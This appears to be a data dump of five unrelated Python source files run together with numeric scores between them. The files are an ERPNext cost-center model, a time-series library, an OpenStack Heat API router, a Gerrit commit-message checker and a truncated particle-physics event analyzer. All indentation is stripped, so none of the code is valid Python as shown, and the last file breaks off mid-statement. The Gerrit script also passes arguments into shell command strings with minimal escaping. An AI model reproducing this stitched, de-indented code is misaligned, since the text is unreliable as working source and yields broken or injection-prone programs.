import frappe
from frappe import _
from frappe.utils import cint, cstr
from frappe.utils.nestedset import NestedSet
class CostCenter(NestedSet):
nsm_parent_field = 'parent_cost_center'
def autoname(self):
self.name = self.cost_center_name.strip() + ' - ' + \
frappe.db.get_value("Company", self.company, "abbr")
def validate(self):
self.validate_mandatory()
def validate_mandatory(self):
if self.cost_center_name != self.company and not self.parent_cost_center:
frappe.throw(_("Please enter parent cost center"))
elif self.cost_center_name == self.company and self.parent_cost_center:
frappe.throw(_("Root cannot have a parent cost center"))
def convert_group_to_ledger(self):
if self.check_if_child_exists():
frappe.throw(_("Cannot convert Cost Center to ledger as it has child nodes"))
elif self.check_gle_exists():
frappe.throw(_("Cost Center with existing transactions can not be converted to ledger"))
else:
self.is_group = 0
self.save()
return 1
def convert_ledger_to_group(self):
if self.check_gle_exists():
frappe.throw(_("Cost Center with existing transactions can not be converted to group"))
else:
self.is_group = 1
self.save()
return 1
def check_gle_exists(self):
return frappe.db.get_value("GL Entry", {"cost_center": self.name})
def check_if_child_exists(self):
return frappe.db.sql("select name from `tabCost Center` where \
parent_cost_center = %s and docstatus != 2", self.name)
def before_rename(self, olddn, newdn, merge=False):
# Add company abbr if not provided
from erpnext.setup.doctype.company.company import get_name_with_abbr
new_cost_center = get_name_with_abbr(newdn, self.company)
# Validate properties before merging
super(CostCenter, self).before_rename(olddn, new_cost_center, merge, "is_group")
return new_cost_center
def after_rename(self, olddn, newdn, merge=False):
super(CostCenter, self).after_rename(olddn, newdn, merge)
if not merge:
new_cost_center = frappe.db.get_value("Cost Center", newdn, ["cost_center_name", "cost_center_number"], as_dict=1)
# exclude company abbr
new_parts = newdn.split(" - ")[:-1]
# update cost center number and remove from parts
if new_parts[0][0].isdigit():
if len(new_parts) == 1:
new_parts = newdn.split(" ")
if new_cost_center.cost_center_number != new_parts[0]:
validate_field_number("Cost Center", self.name, new_parts[0], self.company, "cost_center_number")
self.cost_center_number = new_parts[0]
self.db_set("cost_center_number", new_parts[0])
new_parts = new_parts[1:]
# update cost center name
cost_center_name = " - ".join(new_parts)
if new_cost_center.cost_center_name != cost_center_name:
self.cost_center_name = cost_center_name
self.db_set("cost_center_name", cost_center_name)
def on_doctype_update():
frappe.db.add_index("Cost Center", ["lft", "rgt"])
def get_doc_name_autoname(field_value, doc_title, name, company):
if company:
name_split=name.split("-")
parts = [doc_title.strip(), name_split[len(name_split)-1].strip()]
else:
parts = [doc_title.strip()]
if cstr(field_value).strip():
parts.insert(0, cstr(field_value).strip())
return ' - '.join(parts)
def validate_field_number(doctype_name, name, field_value, company, field_name):
if field_value:
if company:
doctype_with_same_number = frappe.db.get_value(doctype_name,
{field_name: field_value, "company": company, "name": ["!=", name]})
else:
doctype_with_same_number = frappe.db.get_value(doctype_name,
{field_name: field_value, "name": ["!=", name]})
if doctype_with_same_number:
frappe.throw(_("{0} Number {1} already used in account {2}")
.format(doctype_name, field_value, doctype_with_same_number))
@frappe.whitelist()
def update_number_field(doctype_name, name, field_name, field_value, company):
doc_title = frappe.db.get_value(doctype_name, name, frappe.scrub(doctype_name)+"_name")
validate_field_number(doctype_name, name, field_value, company, field_name)
frappe.db.set_value(doctype_name, name, field_name, field_value)
if doc_title[0].isdigit():
separator = " - " if " - " in doc_title else " "
doc_title = doc_title.split(separator, 1)[1]
frappe.db.set_value(doctype_name, name, frappe.scrub(doctype_name)+"_name", doc_title)
new_name = get_doc_name_autoname(field_value, doc_title, name, company)
if name != new_name:
frappe.rename_doc(doctype_name, name, new_name)
return new_name | 0.024096 |
#!/usr/bin/env python3
import numpy as np
import math
import numbers
import datetime
import sys
from .helpers import *
from .interfaces import *
class TimeSeries(SizedContainerTimeSeriesInterface):
def __init__(self, time_points, data_points):
'''Implements the SizedContainerTimeSeriesInterface using Python lists for storage.
Args:
`time_points` (sequence): A sequence of time points. Must have length equal to `data_points.`
`data_points` (sequence): A sequence of data points. Must have length equal to `time_points.`
Returns:
TimeSeries: A time series containing time and data points.'''
super().__init__(time_points, data_points)
self._times = list(time_points)
self._data = list(data_points)
def __len__(self):
'''The length of the time series.
Returns:
int: The number of elements in the time series.'''
return len(self._times)
def __iter__(self):
'''An iterable over the data points of the time series.
Returns:
iterable: An iterable over the data points of the time series.'''
return iter(self._data)
def itertimes(self):
'''Returns an iterator over the TimeSeries times'''
return iter(self._times)
def __sizeof__(self):
'''Returns the size in bytes of the time series storage.'''
return sys.getsizeof(self.time_points) + sys.getsizeof(self.data_points)
class ArrayTimeSeries(TimeSeries):
def __init__(self, time_points, data_points):
'''Implements the SizedContainerTimeSeriesInterface using NumPy arrays for storage.
Args:
`time_points` (sequence): A sequence of time points. Must have length equal to `data_points.`
`data_points` (sequence): A sequence of data points. Must have length equal to `time_points.`
Returns:
ArrayTimeSeries: A time series containing time and data points.'''
super().__init__(time_points, data_points)
self._length = len(time_points)
self._times = np.empty(self._length * 2)
self._data = np.empty(self._length * 2)
self._times[:self._length] = time_points
self._data[:self._length] = data_points
def __len__(self):
return self._length
def __getitem__(self, key):
'''Returns the data point from the TimeSeries with index = key'''
if key >= self._length:
raise IndexError('ArrayTimeSeries index out of range.')
return self._data[key]
def __setitem__(self, key, value):
'''Sets the data point from the TimeSeries with index = key to value'''
if key >= self._length:
raise IndexError('ArrayTimeSeries index out of range.')
self._data[key] = value
def __iter__(self):
return iter(self._data[:self._length])
def itertimes(self):
'''Returns an iterator over the time indices for the ArrayTimeSeries.'''
return iter(self._times[:self._length])
def iteritems(self):
'''Returns an iterator over the tuples (time, value) for each item in the ArrayTimeSeries.'''
return iter(zip(self._times[:self._length], self._data[:self._length]))
def __sizeof__(self):
'''Returns the size in bytes of the time series storage.'''
return sys.getsizeof(self._times) + sys.getsizeof(self._data)
class SimulatedTimeSeries(StreamTimeSeriesInterface):
'''A time series with no internal storage.
Yields data from a supplied generator, either with or without times provided.'''
def __init__(self, generator):
'''Inits SimulatedTimeSeries with a value or (time,value) generator'''
try:
self._gen = iter(generator)
self._index = 0
except:
raise TypeError('Parameter `generator` must be a sequence type.')
def __iter__(self):
'''Returns an iterator that gets a new value from produce'''
return self
def __next__(self):
'''An iterator that gets a new data point from produce'''
return self.produce()[0][1]
def iteritems(self):
'''An iterator that gets a new (time,value) tuple from produce'''
while True:
yield self.produce()[0]
def itertimes(self):
'''An iterator that gets a new time from produce'''
while True:
yield self.produce()[0][0]
def __repr__(self):
format_str = '{}([{}])'
class_name = type(self).__name__
return format_str.format(class_name, str(self._gen))
def produce(self, chunk = 1):
'''Generates a list of up to chunk (time, value) tuples. If optional time is not
provided, adds an integer timestamp (Unix time) to value
Args:
chunk (int): the number of tuples produce generates
Returns:
list: list of (time, value) tuples.'''
values = []
for i in range(chunk):
value = next(self._gen)
if type(value) == tuple:
values.append(value)
else:
values.append((int(datetime.datetime.now().timestamp()), value))
return values
def online_std(self, chunk=1)->StreamTimeSeriesInterface:
"Online standard deviation"
def gen():
n = 0
mu = 0
dev_accum = 0
for i in range(chunk):
tmp = next(self._gen)
(time, value) = (tmp[0], tmp[1])
n += 1
delta = value - mu
dev_accum=dev_accum+(value-mu)*(value-mu-delta/n)
mu = mu + delta/n
if n==1:
stddev = 0
yield (time, stddev)
elif n > 1:
stddev = math.sqrt(dev_accum/(n-1))
yield (time, stddev)
return SimulatedTimeSeries(gen())
def online_mean(self, chunk=1)->StreamTimeSeriesInterface:
"Online mean"
def gen():
n = 0
mu = 0
for i in range(chunk):
tmp = next(self._gen)
(time, value) = (tmp[0], tmp[1])
n += 1
delta = value - mu
mu = mu + delta/n
yield (time, mu)
return SimulatedTimeSeries(gen())
| 0.0039 |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import routes
import six
from heat.api.openstack.v1 import actions
from heat.api.openstack.v1 import build_info
from heat.api.openstack.v1 import events
from heat.api.openstack.v1 import resources
from heat.api.openstack.v1 import services
from heat.api.openstack.v1 import software_configs
from heat.api.openstack.v1 import software_deployments
from heat.api.openstack.v1 import stacks
from heat.common import wsgi
class API(wsgi.Router):
"""WSGI router for Heat v1 REST API requests."""
def __init__(self, conf, **local_conf):
self.conf = conf
mapper = routes.Mapper()
default_resource = wsgi.Resource(wsgi.DefaultMethodController(),
wsgi.JSONRequestDeserializer())
def connect(controller, path_prefix, routes):
"""Connects list of routes to given controller with path_prefix.
This function connects the list of routes to the given
controller, prepending the given path_prefix. Then for each URL it
finds which request methods aren't handled and configures those
to return a 405 error. Finally, it adds a handler for the
OPTIONS method to all URLs that returns the list of allowed
methods with 204 status code.
"""
# register the routes with the mapper, while keeping track of which
# methods are defined for each URL
urls = {}
for r in routes:
url = path_prefix + r['url']
methods = r['method']
if isinstance(methods, six.string_types):
methods = [methods]
methods_str = ','.join(methods)
mapper.connect(r['name'], url, controller=controller,
action=r['action'],
conditions={'method': methods_str})
if url not in urls:
urls[url] = methods
else:
urls[url] += methods
# now register the missing methods to return 405s, and register
# a handler for OPTIONS that returns the list of allowed methods
for url, methods in urls.items():
all_methods = ['HEAD', 'GET', 'POST', 'PUT', 'PATCH', 'DELETE']
missing_methods = [m for m in all_methods if m not in methods]
allowed_methods_str = ','.join(methods)
mapper.connect(url,
controller=default_resource,
action='reject',
allowed_methods=allowed_methods_str,
conditions={'method': missing_methods})
if 'OPTIONS' not in methods:
mapper.connect(url,
controller=default_resource,
action='options',
allowed_methods=allowed_methods_str,
conditions={'method': 'OPTIONS'})
# Stacks
stacks_resource = stacks.create_resource(conf)
connect(controller=stacks_resource,
path_prefix='/{tenant_id}',
routes=[
# Template handling
{
'name': 'template_validate',
'url': '/validate',
'action': 'validate_template',
'method': 'POST'
},
{
'name': 'resource_types',
'url': '/resource_types',
'action': 'list_resource_types',
'method': 'GET'
},
{
'name': 'resource_schema',
'url': '/resource_types/{type_name}',
'action': 'resource_schema',
'method': 'GET'
},
{
'name': 'generate_template',
'url': '/resource_types/{type_name}/template',
'action': 'generate_template',
'method': 'GET'
},
{
'name': 'template_versions',
'url': '/template_versions',
'action': 'list_template_versions',
'method': 'GET'
},
{
'name': 'template_functions',
'url': '/template_versions/{template_version}'
'/functions',
'action': 'list_template_functions',
'method': 'GET'
},
# Stack collection
{
'name': 'stack_index',
'url': '/stacks',
'action': 'index',
'method': 'GET'
},
{
'name': 'stack_create',
'url': '/stacks',
'action': 'create',
'method': 'POST'
},
{
'name': 'stack_preview',
'url': '/stacks/preview',
'action': 'preview',
'method': 'POST'
},
{
'name': 'stack_detail',
'url': '/stacks/detail',
'action': 'detail',
'method': 'GET'
},
# Stack data
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}',
'action': 'lookup',
'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
},
# \x3A matches on a colon.
# Routes treats : specially in its regexp
{
'name': 'stack_lookup',
'url': r'/stacks/{stack_name:arn\x3A.*}',
'action': 'lookup',
'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
},
{
'name': 'stack_lookup_subpath',
'url': '/stacks/{stack_name}/'
'{path:resources|events|template|actions'
'|environment|files}',
'action': 'lookup',
'method': 'GET'
},
{
'name': 'stack_lookup_subpath_post',
'url': '/stacks/{stack_name}/'
'{path:resources|events|template|actions}',
'action': 'lookup',
'method': 'POST'
},
{
'name': 'stack_show',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}/{stack_id}/template',
'action': 'template',
'method': 'GET'
},
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}/{stack_id}/environment',
'action': 'environment',
'method': 'GET'
},
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}/{stack_id}/files',
'action': 'files',
'method': 'GET'
},
# Stack update/delete
{
'name': 'stack_update',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'update',
'method': 'PUT'
},
{
'name': 'stack_update_patch',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'update_patch',
'method': 'PATCH'
},
{
'name': 'preview_stack_update',
'url': '/stacks/{stack_name}/{stack_id}/preview',
'action': 'preview_update',
'method': 'PUT'
},
{
'name': 'preview_stack_update_patch',
'url': '/stacks/{stack_name}/{stack_id}/preview',
'action': 'preview_update_patch',
'method': 'PATCH'
},
{
'name': 'stack_delete',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'delete',
'method': 'DELETE'
},
# Stack abandon
{
'name': 'stack_abandon',
'url': '/stacks/{stack_name}/{stack_id}/abandon',
'action': 'abandon',
'method': 'DELETE'
},
{
'name': 'stack_export',
'url': '/stacks/{stack_name}/{stack_id}/export',
'action': 'export',
'method': 'GET'
},
{
'name': 'stack_snapshot',
'url': '/stacks/{stack_name}/{stack_id}/snapshots',
'action': 'snapshot',
'method': 'POST'
},
{
'name': 'stack_snapshot_show',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}',
'action': 'show_snapshot',
'method': 'GET'
},
{
'name': 'stack_snapshot_delete',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}',
'action': 'delete_snapshot',
'method': 'DELETE'
},
{
'name': 'stack_list_snapshots',
'url': '/stacks/{stack_name}/{stack_id}/snapshots',
'action': 'list_snapshots',
'method': 'GET'
},
{
'name': 'stack_snapshot_restore',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}/restore',
'action': 'restore_snapshot',
'method': 'POST'
},
# Stack outputs
{
'name': 'stack_output_list',
'url': '/stacks/{stack_name}/{stack_id}/outputs',
'action': 'list_outputs',
'method': 'GET'
},
{
'name': 'stack_output_show',
'url': '/stacks/{stack_name}/{stack_id}/outputs/'
'{output_key}',
'action': 'show_output',
'method': 'GET'
}
])
# Resources
resources_resource = resources.create_resource(conf)
stack_path = '/{tenant_id}/stacks/{stack_name}/{stack_id}'
connect(controller=resources_resource, path_prefix=stack_path,
routes=[
# Resource collection
{
'name': 'resource_index',
'url': '/resources',
'action': 'index',
'method': 'GET'
},
# Resource data
{
'name': 'resource_show',
'url': '/resources/{resource_name}',
'action': 'show',
'method': 'GET'
},
{
'name': 'resource_metadata_show',
'url': '/resources/{resource_name}/metadata',
'action': 'metadata',
'method': 'GET'
},
{
'name': 'resource_signal',
'url': '/resources/{resource_name}/signal',
'action': 'signal',
'method': 'POST'
},
{
'name': 'resource_mark_unhealthy',
'url': '/resources/{resource_name}',
'action': 'mark_unhealthy',
'method': 'PATCH'
}
])
# Events
events_resource = events.create_resource(conf)
connect(controller=events_resource, path_prefix=stack_path,
routes=[
# Stack event collection
{
'name': 'event_index_stack',
'url': '/events',
'action': 'index',
'method': 'GET'
},
# Resource event collection
{
'name': 'event_index_resource',
'url': '/resources/{resource_name}/events',
'action': 'index',
'method': 'GET'
},
# Event data
{
'name': 'event_show',
'url': '/resources/{resource_name}/events/{event_id}',
'action': 'show',
'method': 'GET'
}
])
# Actions
actions_resource = actions.create_resource(conf)
connect(controller=actions_resource, path_prefix=stack_path,
routes=[
{
'name': 'action_stack',
'url': '/actions',
'action': 'action',
'method': 'POST'
}
])
# Info
info_resource = build_info.create_resource(conf)
connect(controller=info_resource, path_prefix='/{tenant_id}',
routes=[
{
'name': 'build_info',
'url': '/build_info',
'action': 'build_info',
'method': 'GET'
}
])
# Software configs
software_config_resource = software_configs.create_resource(conf)
connect(controller=software_config_resource,
path_prefix='/{tenant_id}/software_configs',
routes=[
{
'name': 'software_config_index',
'url': '',
'action': 'index',
'method': 'GET'
},
{
'name': 'software_config_create',
'url': '',
'action': 'create',
'method': 'POST'
},
{
'name': 'software_config_show',
'url': '/{config_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'software_config_delete',
'url': '/{config_id}',
'action': 'delete',
'method': 'DELETE'
}
])
# Software deployments
sd_resource = software_deployments.create_resource(conf)
connect(controller=sd_resource,
path_prefix='/{tenant_id}/software_deployments',
routes=[
{
'name': 'software_deployment_index',
'url': '',
'action': 'index',
'method': 'GET'
},
{
'name': 'software_deployment_metadata',
'url': '/metadata/{server_id}',
'action': 'metadata',
'method': 'GET'
},
{
'name': 'software_deployment_create',
'url': '',
'action': 'create',
'method': 'POST'
},
{
'name': 'software_deployment_show',
'url': '/{deployment_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'software_deployment_update',
'url': '/{deployment_id}',
'action': 'update',
'method': 'PUT'
},
{
'name': 'software_deployment_delete',
'url': '/{deployment_id}',
'action': 'delete',
'method': 'DELETE'
}
])
# Services
service_resource = services.create_resource(conf)
with mapper.submapper(
controller=service_resource,
path_prefix='/{tenant_id}/services'
) as sa_mapper:
sa_mapper.connect("service_index",
"",
action="index",
conditions={'method': 'GET'})
# now that all the routes are defined, add a handler for
super(API, self).__init__(mapper)
| 0 |
#!/usr/bin/env python
from __future__ import print_function
import subprocess
import getopt
import sys
SSH_USER = 'bot'
SSH_HOST = 'localhost'
SSH_PORT = 29418
SSH_COMMAND = 'ssh %s@%s -p %d gerrit approve ' % (SSH_USER, SSH_HOST, SSH_PORT)
FAILURE_SCORE = '--code-review=-2'
FAILURE_MESSAGE = 'This commit message does not match the standard.' \
+ ' Please correct the commit message and upload a replacement patch.'
PASS_SCORE = '--code-review=0'
PASS_MESSAGE = ''
def main():
change = None
project = None
branch = None
commit = None
patchset = None
try:
opts, _args = getopt.getopt(sys.argv[1:], '', \
['change=', 'project=', 'branch=', 'commit=', 'patchset='])
except getopt.GetoptError as err:
print('Error: %s' % (err))
usage()
sys.exit(-1)
for arg, value in opts:
if arg == '--change':
change = value
elif arg == '--project':
project = value
elif arg == '--branch':
branch = value
elif arg == '--commit':
commit = value
elif arg == '--patchset':
patchset = value
else:
print('Error: option %s not recognized' % (arg))
usage()
sys.exit(-1)
if change == None or project == None or branch == None \
or commit == None or patchset == None:
usage()
sys.exit(-1)
command = 'git cat-file commit %s' % (commit)
status, output = subprocess.getstatusoutput(command)
if status != 0:
print('Error running \'%s\'. status: %s, output:\n\n%s' % \
(command, status, output))
sys.exit(-1)
commitMessage = output[(output.find('\n\n')+2):]
commitLines = commitMessage.split('\n')
if len(commitLines) > 1 and len(commitLines[1]) != 0:
fail(commit, 'Invalid commit summary. The summary must be ' \
+ 'one line followed by a blank line.')
i = 0
for line in commitLines:
i = i + 1
if len(line) > 80:
fail(commit, 'Line %d is over 80 characters.' % i)
passes(commit)
def usage():
print('Usage:\n')
print(sys.argv[0] + ' --change <change id> --project <project name> ' \
+ '--branch <branch> --commit <sha1> --patchset <patchset id>')
def fail( commit, message ):
command = SSH_COMMAND + FAILURE_SCORE + ' -m \\\"' \
+ _shell_escape( FAILURE_MESSAGE + '\n\n' + message) \
+ '\\\" ' + commit
subprocess.getstatusoutput(command)
sys.exit(1)
def passes( commit ):
command = SSH_COMMAND + PASS_SCORE + ' -m \\\"' \
+ _shell_escape(PASS_MESSAGE) + ' \\\" ' + commit
subprocess.getstatusoutput(command)
def _shell_escape(x):
s = ''
for c in x:
if c in '\n':
s = s + '\\\"$\'\\n\'\\\"'
else:
s = s + c
return s
if __name__ == '__main__':
main()
| 0.009231 |
#!/usr/bin/env python
"""
Analyzer of B0d -> K*0 Ds+ Ds- events
| | |-> pi- pi- pi+ K0L
| |-> pi+ pi+ pi- K0L
|-> K+ pi-
Note: it is supposed to be used within heppy_fcc framework
"""
import math
import time
import numpy
from heppy_fcc.utility.CommonAnalyzer import CommonAnalyzer
from heppy_fcc.utility.Particle import Particle
class BackgroundBs2DsDsKWithDs2PiPiPiKAnalyzer(CommonAnalyzer):
"""
Analyzer of B0d -> K*0 Ds+ Ds- background events
| | |-> pi- pi- pi+ K0L
| |-> pi+ pi+ pi- K0L
|-> K+ pi-
Inherits from heppy_fcc.utility.CommonAnalyzer. Extends the base class to cover analysis-specific needs
"""
def __init__(self, cfg_ana, cfg_comp, looper_name):
"""
Constructor
Arguments:
cfg_ana: passed to the base class
cfg_comp: passed to the base class
looper_name: passed to the base class
"""
super(BackgroundBs2DsDsKWithDs2PiPiPiKAnalyzer, self).__init__(cfg_ana, cfg_comp, looper_name)
# MC truth values
self.mc_truth_tree.var('n_particles')
self.mc_truth_tree.var('event_number')
self.mc_truth_tree.var('pv_x')
self.mc_truth_tree.var('pv_y')
self.mc_truth_tree.var('pv_z')
self.mc_truth_tree.var('sv_x')
self.mc_truth_tree.var('sv_y')
self.mc_truth_tree.var('sv_z')
self.mc_truth_tree.var('tv_dplus_x')
self.mc_truth_tree.var('tv_dplus_y')
self.mc_truth_tree.var('tv_dplus_z')
self.mc_truth_tree.var('tv_dminus_x')
self.mc_truth_tree.var('tv_dminus_y')
self.mc_truth_tree.var('tv_dminus_z')
self.mc_truth_tree.var('b_px')
self.mc_truth_tree.var('b_py')
self.mc_truth_tree.var('b_pz')
self.mc_truth_tree.var('kstar_px')
self.mc_truth_tree.var('kstar_py')
self.mc_truth_tree.var('kstar_pz')
self.mc_truth_tree.var('k_px')
self.mc_truth_tree.var('k_py')
self.mc_truth_tree.var('k_pz')
self.mc_truth_tree.var('k_q')
self.mc_truth_tree.var('pi_kstar_px')
self.mc_truth_tree.var('pi_kstar_py')
self.mc_truth_tree.var('pi_kstar_pz')
self.mc_truth_tree.var('pi_kstar_q')
self.mc_truth_tree.var('dplus_px')
self.mc_truth_tree.var('dplus_py')
self.mc_truth_tree.var('dplus_pz')
self.mc_truth_tree.var('pi1_dplus_px')
self.mc_truth_tree.var('pi1_dplus_py')
self.mc_truth_tree.var('pi1_dplus_pz')
self.mc_truth_tree.var('pi1_dplus_q')
self.mc_truth_tree.var('pi2_dplus_px')
self.mc_truth_tree.var('pi2_dplus_py')
self.mc_truth_tree.var('pi2_dplus_pz')
self.mc_truth_tree.var('pi2_dplus_q')
self.mc_truth_tree.var('pi3_dplus_px')
self.mc_truth_tree.var('pi3_dplus_py')
self.mc_truth_tree.var('pi3_dplus_pz')
self.mc_truth_tree.var('pi3_dplus_q')
self.mc_truth_tree.var('k0_dplus_px')
self.mc_truth_tree.var('k0_dplus_py')
self.mc_truth_tree.var('k0_dplus_pz')
self.mc_truth_tree.var('dminus_px')
self.mc_truth_tree.var('dminus_py')
self.mc_truth_tree.var('dminus_pz')
self.mc_truth_tree.var('pi1_dminus_px')
self.mc_truth_tree.var('pi1_dminus_py')
self.mc_truth_tree.var('pi1_dminus_pz')
self.mc_truth_tree.var('pi1_dminus_q')
self.mc_truth_tree.var('pi2_dminus_px')
self.mc_truth_tree.var('pi2_dminus_py')
self.mc_truth_tree.var('pi2_dminus_pz')
self.mc_truth_tree.var('pi2_dminus_q')
self.mc_truth_tree.var('pi3_dminus_px')
self.mc_truth_tree.var('pi3_dminus_py')
self.mc_truth_tree.var('pi3_dminus_pz')
self.mc_truth_tree.var('pi3_dminus_q')
self.mc_truth_tree.var('k0_dminus_px')
self.mc_truth_tree.var('k0_dminus_py')
self.mc_truth_tree.var('k0_dminus_pz')
def process(self, event):
"""
Overriden base class function
Processes the event
Arguments:
event: unused
"""
b = None # B particle
kstar = None # K* from B decay
k = None # K from K* decay
pi_kstar = None # pi from K* decay
dplus= None # Ds+ from Bs decay
dminus = None # Ds- from Bs decay
pi1_dplus = None # pi from Ds+ decay
pi2_dplus = None # pi from Ds+ decay
pi3_dplus = None # pi from Ds+ decay
k0_dplus = None # pi0 from Ds+ decay
pi1_dminus = None # pi from Ds- decay
pi2_dminus = None # pi from Ds- decay
pi3_dminus = None # pi from Ds- decay
k0_dminus = None # pi0 from Ds- decay
pv = None # primary vertex
sv = None # secondary vertex
tv_dplus = None # tau+ decay vertex
tv_dminus = None # tau- decay vertex
pvsv_distance = 0. # distance between PV and SV
pb = 0. # B momentum
max_svtv_distance = 0. # maximal distance between SV and TV
event_info = event.input.get("EventInfo")
particles_info = event.input.get("GenParticle")
event_number = event_info.at(0).Number()
ptcs = list(map(Particle.fromfccptc, particles_info))
n_particles = len(ptcs)
# looking for B
for ptc_gen1 in ptcs:
if abs(ptc_gen1.pdgid) == 531 and ptc_gen1.start_vertex != ptc_gen1.end_vertex: # if B0s found and it's not an oscillation
self.counter += 1
if self.counter % 100 == 0:
print('Processing decay #{} ({:.1f} decays / s)'.format(self.counter, 100. / (time.time() - self.last_timestamp)))
self.last_timestamp = time.time()
b = ptc_gen1
pb = b.p.absvalue()
if pb > 25.: # Select only events with large momentum of the B
self.pb_counter += 1
pv = b.start_vertex
sv = b.end_vertex
pvsv_distance = math.sqrt((sv.x - pv.x) ** 2 + (sv.y - pv.y) ** 2 + (sv.z - pv.z) ** 2)
if pvsv_distance > 1.: # Select only events with long flight distance of the B
self.pvsv_distance_counter += 1
for ptc_gen2 in ptcs:
if ptc_gen2.start_vertex == b.end_vertex:
# looking for Ds+
if ptc_gen2.pdgid == 431:
dplus = ptc_gen2
tv_dplus = dplus.end_vertex
# looking for Ds-
if ptc_gen2.pdgid == -431:
dminus = ptc_gen2
tv_dminus = dminus.end_vertex
# looking for K*
if abs(ptc_gen2.pdgid) == 313:
kstar = ptc_gen2
max_svtv_distance = max(math.sqrt((tv_dplus.x - sv.x) ** 2 + (tv_dplus.y - sv.y) ** 2 + (tv_dplus.z - sv.z) ** 2), math.sqrt((tv_dminus.x - sv.x) ** 2 + (tv_dminus.y - sv.y) ** 2 + (tv_dminus.z - sv.z) ** 2))
if max_svtv_distance > 0.5: # select only events with long flight distance of tau
self.max_svtv_distance_counter += 1
pis_dplus = []
pis_dminus = []
for ptc_gen3 in ptcs:
if ptc_gen3.start_vertex == kstar.end_vertex:
# looking for K
if abs(ptc_gen3.pdgid) == 321:
k = ptc_gen3
# looking for pi
if abs(ptc_gen3.pdgid) == 211:
pi_kstar = ptc_gen3
if ptc_gen3.start_vertex == dplus.end_vertex:
# looking for pi+/-
if abs(ptc_gen3.pdgid) == 211:
pis_dplus.append(ptc_gen3)
# looking for K0L
if ptc_gen3.pdgid == 130:
k0_dplus = ptc_gen3
if ptc_gen3.start_vertex == dminus.end_vertex:
# looking for pi+/-
if abs(ptc_gen3.pdgid) == 211:
pis_dminus.append(ptc_gen3)
# looking for K0L
if ptc_gen3.pdgid == 130:
k0_dminus = ptc_gen3
if len(pis_dplus) == 3:
pi1_dplus, pi2_dplus, pi3_dplus = pis_dplus[0], pis_dplus[1], pis_dplus[2]
if len(pis_dminus) == 3:
pi1_dminus, pi2_dminus, pi3_dminus = pis_dminus[0], pis_dminus[1], pis_dminus[2]
# filling histograms
self.pvsv_distance_hist.Fill(pvsv_distance)
self.pb_hist.Fill(pb)
self.max_svtv_distance_hist.Fill(max_svtv_distance)
# filling MC truth information
self.mc_truth_tree.fill('event_number', event_number)
self.mc_truth_tree.fill('n_particles', n_particles)
self.mc_truth_tree.fill('pv_x', pv.x)
self.mc_truth_tree.fill('pv_y', pv.y)
self.mc_truth_tree.fill('pv_z', pv.z)
self.mc_truth_tree.fill('sv_x', sv.x)
self.mc_truth_tree.fill('sv_y', sv.y)
self.mc_truth_tree.fill('sv_z', sv.z)
self.mc_truth_tree.fill('tv_dplus_x', tv_dplus.x)
self.mc_truth_tree.fill('tv_dplus_y', tv_dplus.y)
self.mc_truth_tree.fill('tv_dplus_z', tv_dplus.z)
self.mc_truth_tree.fill('tv_dminus_x', tv_dminus.x)
self.mc_truth_tree.fill('tv_dminus_y', tv_dminus.y)
self.mc_truth_tree.fill('tv_dminus_z', tv_dminus.z)
self.mc_truth_tree.fill('b_px', b.p.px)
self.mc_truth_tree.fill('b_py', b.p.py)
self.mc_truth_tree.fill('b_pz', b.p.pz)
self.mc_truth_tree.fill('kstar_px', kstar.p.px)
self.mc_truth_tree.fill('kstar_py', kstar.p.py)
self.mc_truth_tree.fill('kstar_pz', kstar.p.pz)
self.mc_truth_tree.fill('k_q', k.charge)
self.mc_truth_tree.fill('k_px', k.p.px)
self.mc_truth_tree.fill('k_py', k.p.py)
self.mc_truth_tree.fill('k_pz', k.p.pz)
self.mc_truth_tree.fill('pi_kstar_q', pi_kstar.charge)
self.mc_truth_tree.fill('pi_kstar_px', pi_kstar.p.px)
self.mc_truth_tree.fill('pi_kstar_py', pi_kstar.p.py)
self.mc_truth_tree.fill('pi_kstar_pz', pi_kstar.p.pz)
self.mc_truth_tree.fill('dplus_px', dplus.p.px)
self.mc_truth_tree.fill('dplus_py', dplus.p.py)
self.mc_truth_tree.fill('dplus_pz', dplus.p.pz)
self.mc_truth_tree.fill('pi1_dplus_q', pi1_dplus.charge)
self.mc_truth_tree.fill('pi1_dplus_px', pi1_dplus.p.px)
self.mc_truth_tree.fill('pi1_dplus_py', pi1_dplus.p.py)
self.mc_truth_tree.fill('pi1_dplus_pz', pi1_dplus.p.pz)
self.mc_truth_tree.fill('pi2_dplus_q', pi2_dplus.charge)
self.mc_truth_tree.fill('pi2_dplus_px', pi2_dplus.p.px)
self.mc_truth_tree.fill('pi2_dplus_py', pi2_dplus.p.py)
self.mc_truth_tree.fill('pi2_dplus_pz', pi2_dplus.p.pz)
self.mc_truth_tree.fill('pi3_dplus_q', pi3_dplus.charge)
self.mc_truth_tree.fill('pi3_dplus_px', pi3_dplus.p.px)
self.mc_truth_tree.fill('pi3_dplus_py', pi3_dplus.p.py)
self.mc_truth_tree.fill('pi3_dplus_pz', pi3_dplus.p.pz)
self.mc_truth_tree.fill('k0_dplus_px', k0_dplus.p.px)
self.mc_truth_tree.fill('k0_dplus_py', k0_dplus.p.py)
self.mc_truth_tree.fill('k0_dplus_pz', k0_dplus.p.pz)
self.mc_truth_tree.fill('dminus_px', dminus.p.px)
